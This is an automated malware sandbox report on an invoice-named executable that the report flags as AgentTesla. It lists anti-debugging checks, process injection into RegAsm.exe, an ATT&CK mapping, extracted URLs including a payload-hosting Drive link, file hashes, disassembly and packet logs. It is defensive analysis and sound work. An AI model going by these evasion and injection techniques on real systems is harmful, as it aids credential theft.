Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00C216D0 rdtsc

3_2_00C216D0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00C233E3 mov eax, dword ptr fs:[00000030h]	3_2_00C233E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00C21BF5 mov eax, dword ptr fs:[00000030h]	3_2_00C21BF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00C233FD mov eax, dword ptr fs:[00000030h]	3_2_00C233FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00C22FBC mov eax, dword ptr fs:[00000030h]	3_2_00C22FBC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00C22D7E mov eax, dword ptr fs:[00000030h]	3_2_00C22D7E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\faktura_ODfk0021.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C20000

Jump to behavior

Source: C:\Users\user\Desktop\faktura_ODfk0021.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\faktura_ODfk0021.exe'

Jump to behavior

Source: RegAsm.exe, 00000003.00000002.492429654.0000000001420000.00000002.00000001.sdmp	Binary or memory string: uProgram Manager
Source: RegAsm.exe, 00000003.00000002.492429654.0000000001420000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 00000003.00000002.492429654.0000000001420000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: RegAsm.exe, 00000003.00000002.492429654.0000000001420000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00C23314 cpuid

3_2_00C23314

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000003.00000002.499283716.000000001DA11000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6328, type: MEMORY

Source: Yara match	File source: 00000003.00000002.499283716.000000001DA11000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6328, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000003.00000002.499283716.000000001DA11000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6328, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	DLL Side-Loading1	Process Injection112	Disable or Modify Tools1	OS Credential Dumping	Security Software Discovery731	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Virtualization/Sandbox Evasion341	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection112	Security Account Manager	Virtualization/Sandbox Evasion341	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol12	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	DLL Side-Loading1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery423	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
faktura_ODfk0021.exe	9%	ReversingLabs	Win32.Worm.Wbvb

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://zQsfOZ.com	0%	Avira URL Cloud	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
googlehosted.l.googleusercontent.com	172.217.23.33	true	false		high
doc-0s-04-docs.googleusercontent.com	unknown	unknown	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	RegAsm.exe, 00000003.00000002.499283716.000000001DA11000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	RegAsm.exe, 00000003.00000002.499283716.000000001DA11000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://pki.goog/gsr2/GTS1O1.crt0	RegAsm.exe, 00000003.00000002.491961756.0000000000FFA000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://doc-0s-04-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/uq2l008j	RegAsm.exe, 00000003.00000002.491961756.0000000000FFA000.00000004.00000020.sdmp	false		high
http://zQsfOZ.com	RegAsm.exe, 00000003.00000002.499283716.000000001DA11000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pki.goog/gsr2/gsr2.crl0?	RegAsm.exe, 00000003.00000002.491961756.0000000000FFA000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://pki.goog/repository/0	RegAsm.exe, 00000003.00000002.491961756.0000000000FFA000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	RegAsm.exe, 00000003.00000002.499283716.000000001DA11000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.pki.goog/GTS1O1core.crl0	RegAsm.exe, 00000003.00000002.491961756.0000000000FFA000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.217.23.33	googlehosted.l.googleusercontent.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	387666
Start date:	15.04.2021
Start time:	14:02:16
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	faktura_ODfk0021.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.evad.winEXE@4/0@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 17% (good quality ratio 7.2%) Quality average: 25.8% Quality standard deviation: 32%
HCA Information:	Successful, ratio: 94% Number of executed functions: 26 Number of non-executed functions: 24
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 20.82.210.154, 40.88.32.150, 92.122.145.220, 92.122.144.200, 13.64.90.137, 172.217.20.238, 52.255.188.83, 2.20.143.16, 2.20.142.210, 51.103.5.186, 104.43.193.48, 23.32.238.234, 23.32.238.177, 52.155.217.156, 20.54.26.129 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, drive.google.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/387666/sample/faktura_ODfk0021.exe

Simulations

Behavior and APIs

Time	Type	Description
14:03:56	API Interceptor	543x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	documents-1865367136.xlsb	Get hash	malicious	Browse	172.217.23.33
	documents-1522654785.xlsb	Get hash	malicious	Browse	172.217.23.33
	documents-1988650417.xlsb	Get hash	malicious	Browse	172.217.23.33
	documents-852304211.xlsb	Get hash	malicious	Browse	172.217.23.33
	Tooligram_PRO.exe	Get hash	malicious	Browse	172.217.23.33
	documents-1884913828.xlsb	Get hash	malicious	Browse	172.217.23.33
	documents-1097636918.xlsb	Get hash	malicious	Browse	172.217.23.33
	documents-798055763.xlsb	Get hash	malicious	Browse	172.217.23.33
	documents-590513756.xlsb	Get hash	malicious	Browse	172.217.23.33
	#Ud83d#Udcde Bpost.be AudioMessage 59-20596.htm	Get hash	malicious	Browse	172.217.23.33
	VoicePlayback (01_47) for steph.miller tsbbank .html	Get hash	malicious	Browse	172.217.23.33
	Factura proforma, nuevo pedido.exe	Get hash	malicious	Browse	172.217.23.33
	documents-1321106901.xlsb	Get hash	malicious	Browse	172.217.23.33
	BR-424305.htm	Get hash	malicious	Browse	172.217.23.33
	0901e76c84536f06b_2500332020005403099_0901e76c4489e546f06b_250020214405500030995.WsF	Get hash	malicious	Browse	172.217.23.33
	mail_6512365134_7863_20210413.html	Get hash	malicious	Browse	172.217.23.33
	Cocha904.htm	Get hash	malicious	Browse	172.217.23.33
	documents-1136727851.xlsb	Get hash	malicious	Browse	172.217.23.33
	Lista comenzilor.exe	Get hash	malicious	Browse	172.217.23.33
	documents-2136656015.xlsb	Get hash	malicious	Browse	172.217.23.33

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.82523235745994
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	faktura_ODfk0021.exe
File size:	73728
MD5:	b7b1644fce14205acecbe822df95749a
SHA1:	4cbfa9cf4b8dc27bf2b2a2463761092d5c2402e7
SHA256:	f760c40ea4cca84e06c511f96c8d43525350e3f52c97c1baa30528d9c4fbcfec
SHA512:	8110f60d9c116b277a247b059099100afaf3ebf4fd9e685686c043b78119e2ebf3e5793128c6c607b992d231a92101956b4738a213e0ca6bf8f291d2e68a0a7e
SSDEEP:	1536:A35XClFvvI5WX5sdzUPgKYxVm18htRXPA:EXClBI5zi1utFPA
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L.....w`.....................0....................@................

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x4015b4
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x6077DFAB [Thu Apr 15 06:39:39 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	fff80e017e94a979a89868fcc864e987

Entrypoint Preview

Instruction
push 0040179Ch
call 00007F21FCF8FE35h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, al
scasb
push edx
xor cl, cl
mov edx, C1B4469Ah
cmp al, 4Eh
jne 00007F21FCF8FE80h
int1
mov ebx, 00000000h
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
or cl, byte ptr [726F460Ah]
push ebx
push 00000075h
jnc 00007F21FCF8FEADh
jc 00007F21FCF8FEACh
jc 00007F21FCF8FE77h
add byte ptr [eax], ah
dec ecx
or ax, 00000000h
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
add eax, 6D740047h
mov ebp, A34121E1h
jne 00007F21FCF8FE9Dh
into
mov ebp, B5608642h
wait
in al, FAh
insd
dec eax
inc edi
dec ebx
sbb dword ptr [edx], 24BD732Fh
loopne 00007F21FCF8FE50h
cmp cl, byte ptr [edi-53h]
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
cmp eax, 52000001h
add byte ptr [eax], al
add byte ptr [eax], al
push cs
add byte ptr [ebx+45h], al
dec esi
push esp
inc ebp
push edx
dec eax
inc ecx
dec esp
inc esi
inc edx
inc ecx
inc ebx
dec ebx
add byte ptr [42000B01h], cl

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xf864	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x12000	0x8e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x15c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xee24	0xf000	False	0.473046875	data	6.47418964724	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x10000	0x12a8	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x12000	0x8e0	0x1000	False	0.16552734375	data	1.93654602979	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x127b0	0x130	data
RT_ICON	0x124c8	0x2e8	data
RT_ICON	0x123a0	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x12370	0x30	data
RT_VERSION	0x12150	0x220	data	Chinese	Taiwan

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaVarTstLt, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaObjVar, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaFileOpen, __vbaNew2, __vbaR8Str, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaLateMemCall, __vbaStrToAnsi, __vbaVarDup, __vbaFpI4, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0404 0x04b0
InternalName	Cass7
FileVersion	1.00
CompanyName	ADP
ProductName	ADP
ProductVersion	1.00
FileDescription	ADP
OriginalFilename	Cass7.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	Taiwan

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 15, 2021 14:03:48.067195892 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.110661030 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.110769033 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.111541986 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.156805038 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.170378923 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.170437098 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.170475006 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.170511961 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.170531034 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.170556068 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.170574903 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.181966066 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.225636959 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.225717068 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.227636099 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.275768995 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.827013969 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.827038050 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.827056885 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.827074051 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.827090025 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.827107906 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.827148914 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.830087900 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.830108881 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.830226898 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.830244064 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.833547115 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.833617926 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.833900928 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.833956957 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.836338997 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.836359978 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.836402893 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.836492062 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.839488029 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.839509964 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.839556932 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.839572906 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.842108965 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.842129946 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.842190981 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.870493889 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.870529890 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.870584011 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.870604038 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.872016907 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.872037888 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.872087955 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.872103930 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.875106096 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.875178099 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.875179052 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.875221968 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.878283024 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.878315926 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.878360033 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.878376961 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.881469011 CEST	443	49712	172.217.23.33	192.168.2.7
